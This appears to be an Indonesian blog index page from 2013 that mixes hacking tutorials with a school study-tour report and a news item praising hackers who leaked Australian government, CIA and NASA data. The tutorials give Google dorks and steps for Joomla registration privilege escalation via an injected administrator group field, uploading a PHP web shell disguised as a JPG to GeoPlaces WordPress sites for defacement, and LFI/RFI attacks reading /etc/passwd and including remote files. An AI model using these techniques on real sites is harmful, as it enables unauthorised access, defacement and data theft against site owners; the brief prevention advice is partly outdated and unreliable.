Newest Post

NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

| 11/16/2013
Baca selengkapnya »
NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

Celah ini memungkinkan kita untuk meningkatkan hak joomla untuk mendaftarkan

pengguna baru, untuk versi 1.6.x/1.7.x belum diterbitkan sejauh ada patch
versi dan 1.0.x/1.5.x/2.5.3 + tidak rentan. tapi untuk kami
menghibur v 1.5.x (yang tidak ditambal) joomla memiliki bug terkenal token, Anda dapat mengubah admin lulus,
baik itu topik yang lain. : P


Mari kita fokus pada kita sendiri dan mengeksploitasi kerentanan ini xD! Banyak situs menggunakan joomla memilikinya. itu
bug adalah menciptakan kita pengguna baru, tapi sebelum itu kita harus menambahkan parameter
untuk formulir pendaftaran tetapi dapat menggunakan Firebug (Firefox Addon Untuk), terlihat
Situs joomla potensi yang baik dan laten.
Dapatkan Firebug Disini
Dork inurl :/ :: index.php? Option = com_users & pandangan = pendaftaran
Eksploitasi Kode Untuk digunakan dengan Firebug :: <input value="7" name="jform[groups][]" />


[Image: screenshot_285.png]


[Image: screenshot_286.png]


Saya menghapus domain dari halaman tersebut, tetapi dapat menghapusnya dengan melihat logo: P
, Nah kami melihat bahwa ketika melihat kode sumber kita mendapatkan tag META
"Joomla - Open Source Content Management" yang tidak memberitahu kami yang
versi, tapi mungkin bahwa joomla adalah arus atau hampir saat
versi, saya maksud dengan frase tersebut akan diperiksa, namun tidak menjamin bahwa
dapat dengan mudah menghapus atau mengubah, tetapi jika Anda ingin tahu versi yang dapat
mungkin akan menggunakan program CMSEXPLORER yang disertakan dalam distribusi Backtrack. Sekarang mencoba untuk membuat user, kita harus melihat bagian dari pengguna untuk check-in, menulis dalam browser :: P
http://www.site-joomla.com/index.php?opt...gistration

[Image: screenshot_287.png]



Seperti yang saya akan mengisi formulir dengan rincian saya sekarang
menuliskan password saya, saya melakukan ini sehingga ketika saya mengirim parameter mendaftar
(yang kemudian menyuntikkan) untuk tetap terukir dalam sesi rekaman kami, dan menempatkan
sebuah email yang ada dan pada akhirnya mereka mengirimkan pendaftaran
link konfirmasi sekarang menyuntikkan parameter kami hilang dalam pendaftaran
terbentuk dalam rangka untuk mengeksploitasi kerentanan bahagia.
Tekan F12 untuk membuka Firebug dan kemudian mengembangkan langkah-langkah gambar, dan sekarang kita menempatkan kode kecil kami yang hampir di awal tulisan ini.

[Image: screenshot_288.png]


Jika mereka menyadari kode ini di antara tag "<dd> </ dd>" adalah
bahwa versi joomla menggunakan jenis label, maka mungkin menemukan
joomla tanpa tag tersebut, dalam hal ini harus melakukan sebagai struktur dan
melekat padanya, untuk menghindari kegagalan xD! sehubungan dengan kode, jika mereka
menyadari "value = 7", yang memberitahu kita bahwa kita berada di Administrator
kelompok dan bukan grup Super User adalah nilai 8.

[Image: screenshot_289.png]


Yah kita menekan F12 atau meminimalkan pembakar yang kita gunakan tidak lagi, dan melakukan langkah-langkah dalam gambar

[Image: screenshot_290.png]


Setelah memeriksa kita mendapatkan pesan yang mengatakan belum diputuskan memverifikasi dan mengkonfirmasi
pendaftaran email kami disediakan, dan jika tidak ditemukan di daerah
dir spam atau inbox .

[Image: screenshot_291.png]



Setelah mengkonfirmasi administrator panel pendaftaran menyetujui joomla.

http://www.site-joomla.com/administrator dan kami akan masuk.

[Image: screenshot_292.png]

Sumber :)

NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

Posted by : Unknown
Date :11/16/2013
With 1 komentar:
Tag :

CONTOH LAPORAN PERJALANAN

| 11/15/2013
Baca selengkapnya »

CONTOH LAPORAN PERJALANAN STUDYTOUR SMP

LAPORAN PERJALANAN (smpn 02 maos)
Disusun oleh : 1. Catur Riyanto Wibowo Aji ( 07/VIII E )
2. Maryani ( 20/VIII E )
3. Nurul Ikhsan ( 23/VIII E )
4. Aditya Wahyudin ( 03/VIII E )
DINAS PENDIDIKAN, PEMUDA, DAN OLAHRAGA KAB. CILACAP
SMP NEGERI 2 MAOS
TAHUN PELAJARAN 2010/2011
PENDAHULUAN
Pada tanggal 21-24 Desember 2010, SMP Negeri 2 Maos mengadakan kegiatan study tour ke Jakarta. Kegiatan ini diikuti oleh siswa-siswi kelas VIII. Latar belakang dilaksanakannya kegiatan ini berdasarkan :
Progam Pemerintah bidang Wisata dan Budaya “Kenali Negerimu, Cintai Negerimu”.
Peraturan Menteri Pendidikan Nasional No.39 Tahun 2008 tentang Kegiatan Pembinaan Kesiswaan.
Hasil Rapat Guru dan Karyawan tanggal 16 Oktober 2010.
Hasil Rapat Pleno Orangtua Siswa tanggal 25 Oktober 2010.
Progam Kerja OSIS SMP Negeri 2 Maos Tahun Pelajaran 2010/2011.
Keinginan para siswa kelas VIII untuk pergi ke Jakarta.
Sedangkan maksud dan tujuan dilaksanakannya kegiatan study tour bagi siswa kelas VIII yaitu :
Menambah dan meningkatkan pengetahuan/wawasan tentang nilai-nilai Religius, Sejarah, Tekhnologi, Ilmu Pengetahuan dan Rekreasi.
Meningkatkan apresiasi dan kreasi siswa.
Meningkatkan rasa cinta tanah air dan budaya bangsa.
Memberikan kesempatan kepada siswa untuk mendapatkan pengalaman baru yang bersifat langsung.
Membangun keakraban antar siswa dan guru.
Menyukseskan progam pemerintah “Kenali Negerimu, Cintai Negerimu”
Tempat obyek wisata yang kita kunjungi antara lain :
Islamic Center Bekasi
Masjid Istiqlal
GSA (Gelanggang Samudra Ancol)
AWA (Atlantic Water Adventure)
ITC Cempaka Mas
TMII
Museum Listrik dan Energi Baru
Lubang Buaya (Monumen Pancasila Sakti)
Cibaduyut
ISI
PERSIAPAN
Tepat pukul 17.00 WIB, seluruh siswa dan guru pendamping diwajibkan sudah berkumpul di SMP Negeri 2 Maos. Pukul 17.50, siswa yang beragama Islam melaksanakan sholat mahgrib yang dijamak dengan sholat Isya di Aula. Setelah sholat ada sedikit pengarahan dari Kepala Sekolah dan pemandu dari CV, Dewangga kemudian seluruh siswa bersiap untuk berangkat. Pukul 19.30 seluruh rombongan SMP N 2 Maos berangkat dari Cilacap menuju Penginapan di Bekasi sepanjang perjalanan bus yang kita tumpangi sesekali berhenti untuk beristirahat sejenak. Pertama rombongan sampai di Cimanggu, Ciamis, dan selanjutnya di Padalarang. Tepat pukul 04.55 rombongan sampai di penginapan Islamic Center Bekasi untuk check in, sholat, dan mandi. Pukul 06.00 WIB siswa dan guru pendamping sarapan di penginapan. Selanjutnya rombongan pergi menuju Masjid Istiqlal.
MASJID ISTIQLAL
Pukul 08.30 WIB, rombongan sampai di Masjid Istiqlal. Masjid ini merupakan masjid utama di Jakarta. Dibangun pada masa pemerintahan Presiden Soekarno dan merupakan salah satu masjid terbesar dan termegah di Asia Tenggara. Masjid Istiqlal ini berada di jalan Veteran Jakarta Pusat dekat dengan Monas dan Gereja Katedral. Di sini kita melaksanakan sholat Dhuha dan melihat-lihat pemandangan dan keindahan serta kemegahan Masjid ini. Pukul 09.30 rombongan pergi meninggalkan Masjid Istiqlal untuk menuju ke AWA (Atlantic Water Adventure).
AWA (Atlantic Water Adventure)
Tepat pukul 10.30 WIB, rombongan sampai di AWA. AWA merupakan wahana yang relative baru yang merupakan pengembangan dari Gelanggang renang Ancol yang lama. Wahana yang baru ini memiliki sejumlah fasilitas baru yang siap menghibur pengunjung dengan mascot utama berupa kolam ombak buatan. Waktu yang diberikan kepada siswa untuk berenang dan menikmati keindahan alam hanya 1 jam. Dari pukul 11.00-12.00 WIB,oleh karena itu banyak siswa yang tidak sempat berenang. Pukul 12.00 WIB rombongan keluar dari AWA menuju ke bus untuk makan siang (lunch box). Setelah selesai makan siang, rombongan berjalan menuju GSA.
GSA (Gelanggang Samudra Ancol)
Tidak lama berjalan dari AWA ke GSA. Pukul 13.30 WIB rombongan masuk ke GSA. GSA (Gelanggang Samudra Ancol) merupakan sebuah oseanarium (oceanarium) yang menawarkan rekreasi, konservasi dan pendidikan untuk seluruh keluarga, terletak di kawasan Ancol. Di sini dapat menyaksikan berbagai tingkah lacu satwa yang terlatih. Hewan darat seperti berang-berang, beruang madu dan kuda nil serta hewan laut seperti singa laut, lumba-lumba, dan paus putih, ditambah dengan menonton pertunjukan 4 dimensi. Di GSA, rombongan berpencar. Ada yang menonton pertunjukan lumba-lumba, ada yang menonton film 4 dimensi, dan ada juga yang mencoba ke wahana permainan. Namun dari seluruh rombongan SMP N 2 Maos, paling banyak menonton pertunjukan 4 dimensi. Setelah puas menikmati pertunjukan dan permainan yang ada, kira – kira pukul 16.00 WIB rombongan meninggalkan GSA menuju ITC Cempaka Mas.
ITC Cempaka Mas
Pukul 16.30 rombongan sampai di ITC Cempaka Mas. ITC Cempaka Mas merupakan obyek wisata pusat perbelanjaan/mall terbesar di Jakarta. Di sini kami bisa membeli barang-barang kebutuhan sehari-hari yang disajikan secara lengkap dan menarik. Namun, karena barang-barang yang dijual disini mahal-mahal, jadi banyak siswa yang hanya sekedar melihat-lihat saja. Kami hanya diberi waktu sampai pukul 17.00 di ITC Cempaka Mas ini. Namun, waktunya terulur sehingga pukul 18.30 WIB rombongan baru meninggalkan ITC Cempaka Mas menuju ke penginapan di Islamic Center Bekasi.
Islamic Center Bekasi
Pukul 20.00 WIB rombongan sampai di penginapan Islamic Center Bekasi. Di sini siswa makan malam prasmanan, istirahat kemudian acara bebas. Siswa diwajibkan pukul 21.00 WIB sudah tidur semua. Namun, banyak siswa yang belum juga tidur. Pukul 06.00 WIB rombongan makan pagi, kemudian tepat pukul 07.00 WIB rombongan pergi meninggalkan Islamic Center Bekasi menuju ke Lubang Buaya (Monumen Pancasila Sakti).
Lubang Buaya (Monumen Pancasila Sakti)
Pukul 08.00 WIB, rombongan tiba di Lubang Buaya. Lubang Buaya/Monumen Pancasila Sakti merupakan tempat/lokasi para pahlawan revolusi yang gugur oleh kekejaman PKI. Terdapat diorama-diorama dan foto-foto yang menggambarkan peristiwa G30 S/PKI. Tempat ini dibangun pada tanggal 1 Oktober 1967 dengan gagasan Presiden Soeharto. Tempat ini diresmikan tahun 1972. Luas tanah ± 14 ha, yang terdapat di Desa Lubang Buaya, Cipayung, Pondok Gede, Jakarta Timur. Yang paling terkenal di Lubang Buaya adalah sebuah sumur yang biasa digunakan oleh PKI untuk menyembunyikan 7 jenazah jendral revolusi Indonesia. Ketujuh jendral itu adalah :
Ahmad Yani
M.T haryono
S. Parman
Soeprapto
D.I Panajaitan
Brigjen Sutoyo
Kapten Andreas Tendean
Jenazah ketujuh Jendral tersebut dimakamkan di T.M Kalibata. Selain sumur-sumur maut, kita juga dapat melihat dapur umum yang digunakan untuk memasak pada jaman penjajahan, kendaraan yang digunakan untuk membawa jenazah Jendral, juga terdapat museum penghianatan PKI yang di dalamnya terdapat patung-patung pemberotakan PKI, foto-foto asli para pejuang, baju pahlawan revolusi yang masih ada bercak darah, serta barang-barang pahlawan revolusi yang ditemukan saat pengangkatan jenazah dari sumur maut. Lama kami di Lubang Buaya, kira-kira 2 jam rombongan pergi meninggalkan Lubang Buaya pukul 10.00 WIB menuju ke TMII yang dilanjut ke Museum Listrik dan Energi Baru.
TMII (Taman Mini Indonesia Indah)
Tepat pukul 11.00 WIB rombongan sampai di TMII. TMII merupakan miniatur Indonesia yang menggambarkan keanekaragaman budaya, adat istiadat, bangunan rumah adat yang khas juga banyak museum pengetahuan. Karena TMII sangat luas maka rombongan memutuskan untuk melihat-lihat melalui bus saja. Setelah melihat-lihat pukul 11.15 WIB rombongan sampai di Museum Listrik dan Energi Baru.
Museum Listrik dan Energi Baru
Pukul 11.15 WIB, rombongan sampai di Museum Listrik dan Energi Baru. Di sini kami bisa melihat berbagai macam pembangkit listrik, mobil masa depan yang bahan bakarnya dari sinar matahari, kompor energy matahari, pemanfaatan dan cara menggunakan energy matahari, dan lainnya. Sekitar pukul 13.00 WIB rombongan keluar dari Museum Listrik dan Energi Baru untuk makan siang (lunch box). Pukul 14.00, rombongan pergi menuju Cibaduyut.
Cibaduyut
Pukul 17.30 WIB, rombongan tiba di Cibaduyut. Pusat perbelanjaan yang berada di kota Bandung selain Cihampelas dan Bandung Super Mall salah satunya adalah Cibaduyut terletak di jalan Cibaduyut Bandung, tempat ini merupakan pusat kerajinan, pertokoan tas dan sepatu kulit, juga terdapat oleh-oleh berupa makanan khas Jawa Barat seperti dodol garut, peuyeum,dsb. Waktu yang diberikan kepada kami untuk berbelanja dan melihat-lihat cukup lama,sekitar 2,5 jsm. Setelah puas berbelanja, rombongan pergi meninggalkan Cibaduyut pukul 20.00 WIB menuju ke Cilacap. Dalam perjalanan, sekitar pukul 00.15 WIB rombongan mampir kesalah satu took oleh-oleh di Pandyangan, Garut. Setelah itu rombongan langsung pergi menuju ke Cilacap. Sampai di Cilacap ± pukul 04.30 WIB. Seluruh rombongan selamat sampai tujuan.
PENUTUP
Kesimpulan
Saran / kritik
Perjalanan ini memang benar-benar melelahkan. Namun dibalik itu semua terdapat sebuah pengalaman yang tidak pernah akan kami lupakan selama hidup kami. Pemandu dari CV. Dewangga yang ramah dan mengasyikan, tempat-tempat wisata yang menakjubkan, serta guru pendamping yang setia mendampingi dan menjaga kami semua,itulah yang tidak bisa kami lupakan. Mungkin kegiatan study tour ini tidak berjalan dengan apa yang kami bayangkan dan rencanakan, tapi kami maklumi semua ini. Karena rencana tidak selalu berjalan lancer. Kami hanya berharap semoga SMP Negeri 2 Maos terus dan selalu mengadakan progam study tour ini. Dan semoga kegiatan ini bisa berjalan lebih lancer dan menarik lagi. SMP Negeri 2 Maos is the best.
DISUSUN OLEH : ADITYA WAHYUDIN

CONTOH LAPORAN PERJALANAN

Posted by : Unknown
Date :11/15/2013
With 1 komentar:
Tag :

Cara Deface dengan Upload Shell Vulnerability

|
Baca selengkapnya »
Langsung Sikat Bray :)
Dork    :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 
 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 

 

Sumber : http://indocyberarmy.blogspot.com/2013/02/wordpress-geoplaces-themes-shell-upload.html

Cara Deface dengan Upload Shell Vulnerability

Posted by : Unknown
Date :
With 0komentar
Tag :

Cara Deface dengan LFI/RFI

|
Baca selengkapnya »
Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:



Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

Sumber: Hacker Newbie
Edited by : Febri Nur Cahya
Source : http://indocyberarmy.blogspot.com/2013/02/tutor-singkat-rfi-lfi.html

Cara Deface dengan LFI/RFI

Posted by : Unknown
Date :
With 1 komentar:
Tag :

Hacker Indonesia sukses obok-obok data CIA dan NASA

| 11/14/2013
Baca selengkapnya »

Hacker Indonesia sukses obok-obok data CIA dan NASA
Bukan hanya serangan bentuk DDoS dan deface saja yang ternyata bisa dilakukan oleh hacker Indonesia dalam serangan cybernya ke situs pemerintahan Australia. Baru saja, dedemit dunia maya ini juga berhasil mengumpulkan beberapa data rahasia dari CIA Australia.
Pantauan merdeka.com (14/11), hal ini pertama kali diungkap oleh akun Facebook bernama www.facebook.com/steril1337. Akun dengan alias Black'April tersebut membeberkan berbagai data dari database sistem pemerintahan Australia yang kemudian disimpan dalam pastebin.
Beberapa data yang diungkap pun sebenarnya bisa digolongkan kategori rahasia negara. Hal ini karena menyangkut adanya data dari CIA, NASA, dan berbagai misi yang akan diselenggarakan oleh agensi tersebut.
Untuk data yang pertama bocor adalah data mengenai agen CIA Nguyen Ricard. Data ini disalin dalam pastebin http://pastebin.com/7RnbRxa6.
Data yang kedua menyangkut username dan password pemilik akun di Ozi Pilots Online, sebuah situs yang mengindeks berbagai aktivitas terbang para pilot Australia. Data ini dibocorkan dalam http://pastebin.com/7FKJLytP.
Sementara, data mengenai pilot dan misi NASA diungkap melalui http://pastebin.com/Dv95UUwq. Selain itu, banyak lagi yang diungkap dalam pastebin tersebut.
Sampai saat ini sendiri perang cyber yang berkecamuk di Australia belum menunjukkan tanda usai. Hingga kini, hacker Indonesia terus berupaya merontokkan berbagai situs yang jadi afiliasi pemerintahan negeri kanguru tersebut.

Hacker Indonesia sukses obok-obok data CIA dan NASA

Posted by : Unknown
Date :11/14/2013
With 0komentar
Tag :
Next
▲Top▲